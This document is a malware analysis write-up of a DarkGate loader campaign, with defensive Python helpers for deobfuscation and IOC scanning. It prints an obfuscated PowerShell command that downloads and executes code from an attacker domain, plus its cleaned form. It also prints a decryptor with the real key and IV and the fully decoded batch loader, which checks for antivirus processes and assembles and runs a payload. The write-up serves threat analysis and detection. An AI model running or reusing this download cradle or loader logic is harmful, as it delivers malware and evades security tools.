Darkgate Campaign
Introduction
DarkGate is a modular loader and botnet toolkit, first observed in 2017, that lets operators fully compromise victim hosts, persist, drop secondary payloads, and gain remote access and data exfiltration capabilities.
Executive Summary
An obfuscated PowerShell downloader constructs and executes a remote command to fetch NoBu.obb. Static inspection of NoBu.obb revealed randomized variable names, a large Base64 blob, and AES-CBC decryption (with PKCS7 padding). The decrypted output is dropped to the host TEMP directory and executed.
This is a classic staging technique used to evade detection and deliver a secondary payload. Post-execution behavior matches DarkGate loader/botnet activity: the host is prepared for persistence, secondary modules are unpacked and launched, and the implant attempts outbound connections to attacker-controlled infrastructure.
Initial Observation
An obfuscated PowerShell invocation was discovered on the host. The command uses quoted fragments to construct and invoke a remote command via iex and Invoke-RestMethod, an attempt to evade EDR detection:
POwERShelL -"W" h -"CoMMaN"d "i"ex" (irm "h"tt"ps://z"3"n.f"un/N"o"Bu.ob"b)"
After deobfuscation the command looks like this:
PowerShell -WindowStyle Hidden -Command "iex (irm 'https://z3n.fun/NoBu.obb')"
The PowerShell command attempts to download and execute content from hxxps[://]z3n[.]fun/NoBu.obb.
Analysis of NoBu.obb reveals an obfuscated script (randomized variable names) that decodes a Base64 blob, decrypts it with AES-CBC (PKCS7 padding), and drops the resulting file to the system TEMP directory.
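The quote-fragmentation trick above works because the Windows argument parser concatenates adjacent quoted and unquoted fragments, and powershell.exe accepts any unambiguous prefix of a parameter name. The following Python helper is an added example, not part of the original report: it rebuilds the token stream the way powershell.exe sees it, expands abbreviated parameters, and flags the iex-fed-by-irm download cradle. The first sample command is the invocation observed on the host; the second is a constructed benign command for contrast.

```python
import re

# Sample command lines: the first is the obfuscated invocation found on the host
# (copied from this report), the second is a constructed benign command.
SAMPLE_COMMANDS = [
    'POwERShelL -"W" h -"CoMMaN"d "i"ex" (irm "h"tt"ps://z"3"n.f"un/N"o"Bu.ob"b)"',
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
]

# powershell.exe accepts any unambiguous prefix of a parameter name, which is
# what lets "-W h" stand in for "-WindowStyle Hidden".
HOST_PARAMS = [
    "Version", "NoLogo", "NoExit", "Sta", "Mta", "NoProfile", "NonInteractive",
    "InputFormat", "OutputFormat", "WindowStyle", "EncodedCommand",
    "ConfigurationName", "File", "ExecutionPolicy", "Command", "PSConsoleFile", "Help",
]
WINDOW_STYLES = ["Normal", "Hidden", "Minimized", "Maximized"]

DOWNLOAD_CRADLE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
REMOTE_FETCH = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
URL = re.compile(r"https?://[^\s\"')]+", re.I)


def expand_prefix(token, choices):
    """Return the single choice that token abbreviates, or token unchanged."""
    hits = [c for c in choices if c.lower().startswith(token.lower())]
    return hits[0] if len(hits) == 1 else token


def normalize(cmdline):
    """Rebuild the token stream powershell.exe actually parses.

    Adjacent quoted and unquoted fragments are concatenated by the Windows
    argument parser, so deleting every double quote undoes the fragmentation.
    This is a detection normalization only: genuine quoted strings lose their
    grouping, so the result is for matching, never for execution.
    """
    tokens = cmdline.replace('"', "").split()
    out = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if i == 0:
            out.append(tok.lower())          # the executable name, case-folded
        elif tok.startswith("-"):
            name = expand_prefix(tok[1:], HOST_PARAMS)
            out.append("-" + name)
            if name == "Command":
                # Everything after -Command is the script text itself
                out.append(" ".join(tokens[i + 1:]))
                break
            if name == "WindowStyle" and i + 1 < len(tokens):
                out.append(expand_prefix(tokens[i + 1], WINDOW_STYLES))
                i += 1
        else:
            out.append(tok)
        i += 1
    return " ".join(out)


def analyze(cmdline):
    """Normalize a command line and flag the download-and-execute pattern."""
    norm = normalize(cmdline)
    cradle = bool(DOWNLOAD_CRADLE.search(norm))
    fetch = bool(REMOTE_FETCH.search(norm))
    return {
        "normalized": norm,
        "hidden_window": "-WindowStyle Hidden" in norm,
        "download_cradle": cradle,
        "remote_fetch": fetch,
        "urls": URL.findall(norm),
        # iex fed by a remote fetch is the staging pattern seen in this campaign
        "suspicious": cradle and fetch,
    }


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(analyze(cmd))
```

Running it on the observed command yields `powershell -WindowStyle Hidden -Command iex (irm https://z3n.fun/NoBu.obb)`, the same form as the manual deobfuscation above, with `suspicious` set; the benign command normalizes cleanly and is not flagged. Matching on the normalized form rather than the raw command line is what defeats the quote-splitting.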
Decoding Process
The Python script below replicates the original script's behavior by extracting and decrypting its embedded content:
import base64

from Crypto.Cipher import AES          # pycryptodome
from Crypto.Util.Padding import unpad  # validates PKCS7 instead of trusting the last byte

# Key, IV and ciphertext are the Base64 strings lifted from NoBu.obb
key_b64 = "5xTK9HCPrbLHtHKnhoUTy1aKGQ/x8DX53c9K64dEI1E="
iv_b64 = "Yd8Pupt4L/vjrfixEsO0RQ=="
content_b64 = "S0EN+7DbqvoT8c4...<STRIP>...9GQ=="  # full blob omitted here

key = base64.b64decode(key_b64)   # 32 bytes, so AES-256
iv = base64.b64decode(iv_b64)     # 16-byte CBC IV
ciphertext = base64.b64decode(content_b64)

cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(ciphertext)

# Remove PKCS7 padding; unpad raises ValueError on malformed padding,
# which usually means a wrong key/IV or a truncated blob
plaintext = unpad(decrypted, AES.block_size)

with open("unknown", "wb") as f:
    f.write(plaintext)
Extracting the archive and checking the hash:
λ python decrypt.py
λ file unknown
sus.txt: Zip archive data, at least v2.0 to extract
λ unzip unknown
Archive: unknown
inflating: SheetsToo.exe
λ md5sum SheetsToo.exe
f3edd221d30ee029f97b10e06b9162ba *SheetsToo.exe
Checking the hash on VirusTotal: 33/70 engines flagged it as malicious and the family label was DarkGate:
Reverse Engineering
Static Analysis
Checking the file type:
λ file SheetsToo.exe
SheetsToo.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Checking the program with Detect It Easy shows it is a 32-bit program.
Some commands are visible when inspecting the strings in the program:
Dynamic Analysis
The process is run and checked with Process Monitor (procmon):
Dropped files and one folder named 392951:
Looking into Nebraska.wbk.bat: it maps single characters to word-like variable names and rebuilds every command from them. That is its obfuscation method:
Deobfuscation
Extracting only the important words and removing the unknown characters and words gives this:
Set Referral=c
Set Combinations=U
Set B=G
Set Internet=m
Set Tu=I
Set Appear=W
Set Milf=Q
Set Nut=S
Set Vegetables=l
Set Collection=4
Set Bacterial=k
Set Fresh=B
Set Failed=a
Set Crew=C
Set Nearly=.
Set Professor=3
%Nut%et s%Appear%r%B%%Nut%%Nut%V=Rep%Vegetables%i%Referral%%Failed%%Nearly%s%Referral%r
%Nut%et %Crew%JXw%Referral%JXtuAVds%Failed%%Referral%sY%Crew%L%Appear%bVqjX%Milf%Ysg%Referral%%B%J%Bacterial%%Internet%Xd%Failed%=
%Nut%et q%Tu%Af%Internet%XMxON%Internet%v%Internet%qdsXqrbTqv%Crew%n%Fresh%%B%bYitg=5
t%Failed%s%Bacterial%%Vegetables%ist | findstr "bdservi%Referral%ehost e%Bacterial%rn Av%Failed%st%Combinations%%Tu% %Nut%ophosHe%Failed%%Vegetables%th AV%B%%Combinations%%Tu% ns%Appear%s%Referral%%Nut%v%Referral%" & if not error%Vegetables%eve%Vegetables% 1 %Nut%et s%Appear%r%B%%Nut%%Nut%V=Auto%Tu%t%Professor%%Nearly%exe & %Nut%et %Crew%JXw%Referral%JXtuAVds%Failed%%Referral%sY%Crew%L%Appear%bVqjX%Milf%Ysg%Referral%%B%J%Bacterial%%Internet%Xd%Failed%=%Nearly%%Failed%u%Professor% & %Nut%et q%Tu%Af%Internet%XMxON%Internet%v%Internet%qdsXqrbTqv%Crew%n%Fresh%%B%bYitg=287
%Nut%et /%Failed% Free=%Professor%92951
%Internet%d %Free%
st%Failed%rt /w%Failed%it extr%Failed%%Referral%%Professor%2 /Y V%Nearly%wb%Bacterial% *%Nearly%*
set /p ="MZ" > %Free%\%sWrGSSV% <nu%Vegetables%
findstr /V "Kit%Referral%hen" %Appear%hy >> %Free%\%sWrGSSV%
%Referral%opy /b /y %Free%\%sWrGSSV% + Definitions + D%Failed%ughters + He%Failed%vi%Vegetables%y + %Nut%oftb%Failed%%Vegetables%%Vegetables% + Jord%Failed%n + Lo%Vegetables%it%Failed% + Forest + Ap%Failed%rt%Internet%ent + %Nut%urprising + %Tu%nternship + Additions %Free%\%sWrGSSV%
%Referral%d %Free%
%Referral%opy /b /y %Nearly%%Nearly%\%Appear%et%Nearly%wb%Bacterial% + %Nearly%%Nearly%\%Nut%%Referral%reening%Nearly%wb%Bacterial% + %Nearly%%Nearly%\Down%Vegetables%o%Failed%ding%Nearly%wb%Bacterial% R%CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda%
%sWrGSSV% R%CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda%
%Referral%d %Nearly%%Nearly%
w%Failed%itfor /T %qIAfmXMxONmvmqdsXqrbTqvCnBGbYitg% q%Tu%Af%Internet%XMxON%Internet%v%Internet%qdsXqrbTqv%Crew%n%Fresh%%B%bYitg
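Resolving this by hand is error-prone because every `%Name%` is one character and references are packed back to back. The Python helper below is an added example, not part of the original report: it collects the single-character `Set` assignments as the obfuscation alphabet, expands each `%Name%` reference, drops the alphabet definitions, and leaves runtime variables such as `%Free%` untouched so it stays visible which values depend on the AV check. The embedded sample is a constructed excerpt of the cleaned-up Nebraska.wbk.bat lines shown above.

```python
import re

# Constructed excerpt of the cleaned-up Nebraska.wbk.bat shown above: the
# character table plus three of the obfuscated statements.
SAMPLE_BAT = r"""Set Referral=c
Set Combinations=U
Set B=G
Set Internet=m
Set Tu=I
Set Appear=W
Set Milf=Q
Set Nut=S
Set Vegetables=l
Set Collection=4
Set Bacterial=k
Set Fresh=B
Set Failed=a
Set Crew=C
Set Nearly=.
Set Professor=3
%Nut%et s%Appear%r%B%%Nut%%Nut%V=Rep%Vegetables%i%Referral%%Failed%%Nearly%s%Referral%r
st%Failed%rt /w%Failed%it extr%Failed%%Referral%%Professor%2 /Y V%Nearly%wb%Bacterial% *%Nearly%*
%Internet%d %Free%"""

SET_RE = re.compile(r"^\s*set\s+([A-Za-z0-9_]+)=(.*)$", re.I)
REF_RE = re.compile(r"%([A-Za-z0-9_]+)%")


def build_table(lines):
    """Collect 'Set name=<one char>' assignments: that is the obfuscation
    alphabet. cmd variable names are case-insensitive, so keys are lowercased."""
    table = {}
    for line in lines:
        m = SET_RE.match(line)
        if m and len(m.group(2)) == 1:
            table[m.group(1).lower()] = m.group(2)
    return table


def expand(line, table):
    """Replace each %name% with its character. Back-to-back references such as
    %B%%Nut% are handled because re.sub consumes the closing % of each match.
    References not in the alphabet (e.g. %Free%, set at runtime) are kept as-is."""
    return REF_RE.sub(lambda m: table.get(m.group(1).lower(), m.group(0)), line)


def deobfuscate(script):
    """Return the script with the alphabet applied and its definitions removed."""
    lines = script.splitlines()
    table = build_table(lines)
    out = []
    for line in lines:
        m = SET_RE.match(line)
        if m and m.group(1).lower() in table and len(m.group(2)) == 1:
            continue  # drop the alphabet definitions themselves
        out.append(expand(line, table))
    return out


if __name__ == "__main__":
    print("\n".join(deobfuscate(SAMPLE_BAT)))
```

On the excerpt this recovers `Set sWrGSSV=Replica.scr`, `start /wait extrac32 /Y V.wbk *.*` and `md %Free%`. Only one-character assignments are treated as alphabet entries; the real state variables (`sWrGSSV`, the `.au3` extension, the wait time) are set after the AV check and are deliberately left as references rather than guessed.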
Fully decoded version of the deobfuscated script:
Set sWrGSSV=Replica.scr
Set CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda=
Set qIAfmXMxONmvmqdsXqrbTqvCnBGbYitg=5
rem findstr exits 0 when one of the listed AV/EDR processes is running, so
rem "if not errorlevel 1" is true and the AutoIt3 path is taken instead
tasklist | findstr "bdservicehost ekrn AvastUI SophosHealth AVGUI nsWscSvc" & if not errorlevel 1 (
Set sWrGSSV=AutoIt3.exe
Set CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda=.au3
Set qIAfmXMxONmvmqdsXqrbTqvCnBGbYitg=287
)
Set /a Free=392951
md 392951
start /wait extrac32 /Y V.wbk *.*
set /p ="MZ" > 392951\%sWrGSSV% <nul
findstr /V "Kitchen" Why >> 392951\%sWrGSSV%
copy /b /y 392951\%sWrGSSV% + Definitions + Daughters + Heavy + Softball + Jordan + Lolita + Forest + Apartment + Surprising + Internship + Additions 392951\%sWrGSSV%
cd 392951
rem target name expands to R.au3 on the AV branch, otherwise just R
copy /b /y ..\Wet.wbk + ..\Screening.wbk + ..\Downloading.wbk R%CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda%
rem runs Replica.scr (or AutoIt3.exe) with the assembled script as its argument
%sWrGSSV% R%CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda%
cd ..
rem waits 5 seconds, or 287 on the AV branch
waitfor /T %qIAfmXMxONmvmqdsXqrbTqvCnBGbYitg% qIAfmXMxONmvmqdsXqrbTqvCnBGbYitg
Behavior Analysis
Re-simulating the copy step:
λ copy /b /y ..\Wet.wbk + ..\Screening.wbk + ..\Downloading.wbk R.au3
..\Wet.wbk
..\Screening.wbk
..\Downloading.wbk
1 file(s) copied.
When run, it tries to establish the C2 connection:
λ ./Replica.scr R.au3
The C2 connection attempt:
Checking back on VirusTotal, the DNS entry was the same:
Indicators of Compromise
| IOC | Type | File Name |
|---|---|---|
| FmYHjjXUeGKckCRHHxEDWmWbkdx[.]FmYHjjXUeGKckCRHHxEDWmWbkdx | URL/Domain | - |
| hxxps[://]z3n[.]fun/NoBu.obb | URL | - |
| f3edd221d30ee029f97b10e06b9162ba | Hash (MD5) | SheetsToo.exe |
| 5cbed68c61747e7db892f00e507a4dd6 | Hash (MD5) | r.au3 |
| f589c1095824c52a5ed3625d0d851b22 | Hash (MD5) | Replica.scr |
| 188f4fb7f5d742b82224da0e7c54bcab | Hash (MD5) | Nebraska.wbk.bat |
| 796104eddb3e7137abbbd5c3cb55fb6c | Hash (MD5) | NoBu.obb |
| d019fcb03782d699af6b1d98f6193e38 | Hash (MD5) | temp<random_number>.zip |
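The table above is defanged, so it cannot be matched against logs as published. The Python helper below is an added example, not part of the original report: it refangs the indicators, carves the hostname out of the URL entry (so `z3n.fun` is derived from the table rather than added), builds word-bounded domain patterns that do not fire on look-alike names, and scans a set of constructed key=value log lines for URL, domain and MD5 matches. Hostnames, timestamps and the log format are made up for the example.

```python
import re
from urllib.parse import urlparse

# Indicators from the IOC table of this report, kept defanged as published.
DEFANGED_URLS = ["hxxps[://]z3n[.]fun/NoBu.obb"]
DEFANGED_DOMAINS = ["FmYHjjXUeGKckCRHHxEDWmWbkdx[.]FmYHjjXUeGKckCRHHxEDWmWbkdx"]
MD5_HASHES = {
    "f3edd221d30ee029f97b10e06b9162ba": "SheetsToo.exe",
    "5cbed68c61747e7db892f00e507a4dd6": "r.au3",
    "f589c1095824c52a5ed3625d0d851b22": "Replica.scr",
    "188f4fb7f5d742b82224da0e7c54bcab": "Nebraska.wbk.bat",
    "796104eddb3e7137abbbd5c3cb55fb6c": "NoBu.obb",
    "d019fcb03782d699af6b1d98f6193e38": "temp<random_number>.zip",
}

# Constructed log lines in a simple key=value format; hosts and times are made up.
SAMPLE_LOGS = [
    "2025-10-01T10:02:11Z host=WS01 event=dns query=z3n.fun type=A",
    "2025-10-01T10:02:12Z host=WS01 event=http method=GET url=https://z3n.fun/NoBu.obb",
    "2025-10-01T10:03:40Z host=WS01 event=file_create path=C:\\Users\\user\\AppData\\Local\\Temp\\SheetsToo.exe md5=f3edd221d30ee029f97b10e06b9162ba",
    "2025-10-01T10:04:02Z host=WS01 event=dns query=fmyhjjxuegkckcrhhxedwmwbkdx.fmyhjjxuegkckcrhhxedwmwbkdx type=A",
    "2025-10-01T10:05:00Z host=WS02 event=dns query=updates.example.org type=A",
    "2025-10-01T10:05:30Z host=WS02 event=http method=GET url=https://notz3n.fun/index.html",
]


def refang(ioc):
    """Turn the published defanged form back into a matchable string."""
    return ioc.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")


def domain_patterns(urls, domains):
    """Bounded, case-folded regexes for every domain, including hostnames
    carved out of the URL indicators. The boundaries stop 'notz3n.fun' or
    'z3n.fun.example' from matching."""
    names = {urlparse(refang(u)).hostname for u in urls}
    names |= {refang(d).lower() for d in domains}
    return {
        n: re.compile(r"(?<![a-z0-9.-])" + re.escape(n) + r"(?![a-z0-9-])")
        for n in sorted(names)
    }


DOMAIN_RE = domain_patterns(DEFANGED_URLS, DEFANGED_DOMAINS)
URLS = [refang(u).lower() for u in DEFANGED_URLS]


def scan(lines):
    """Return (line_index, ioc_type, ioc) for every indicator found."""
    hits = []
    for i, line in enumerate(lines):
        low = line.lower()   # DNS and URL matching is case-insensitive
        for u in URLS:
            if u in low:
                hits.append((i, "url", u))
        for name, pat in DOMAIN_RE.items():
            if pat.search(low):
                hits.append((i, "domain", name))
        for h, fname in MD5_HASHES.items():
            if h in low:
                hits.append((i, "md5", f"{h} ({fname})"))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

The first four sample lines produce hits (DNS query, the full download URL, the SheetsToo.exe hash, and the DarkGate C2-style domain), while the benign query and the look-alike `notz3n.fun` host do not. The same refang-and-bound approach applies when loading this table into a SIEM watchlist.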